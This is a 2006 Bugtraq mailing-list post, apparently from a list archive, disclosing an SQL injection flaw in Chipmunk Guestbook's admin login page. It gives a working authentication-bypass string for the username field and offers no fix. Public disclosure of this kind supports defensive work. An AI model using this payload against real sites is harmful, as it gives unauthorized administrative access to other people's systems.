SQL Injection in Chipmunk Guestbook

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: SQL Injection in Chipmunk Guestbook
From: dr.jr7@xxxxxxxxxxx
Date: 7 Apr 2006 22:17:26 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

SQL Injection in Chipmunk Guestbook

Vulnerable : Chipmunk Guestbook

Web Site : www.chipmunk-scripts.com

Exploit :

http://www.[site name].com/[Folder name]/admin/login.php

User : 'or 'jr7'='jr7' /*

Pass : anything

Discovered by : Dr.Jr7

GreeTz : T0 mY a11 Fr!nD in www.lezr.com

special thnx for Qptan & Mr.SNAKE

Prev by Date: google xss
Next by Date: RE: Another way to spoof Internet Explorer Address Bar
Previous by thread: Re: google xss
Next by thread: [ MDKSA-2006:068 ] - Updated mplayer packages fix integer overflow vulnerabilities
Index(es):
- Date
- Thread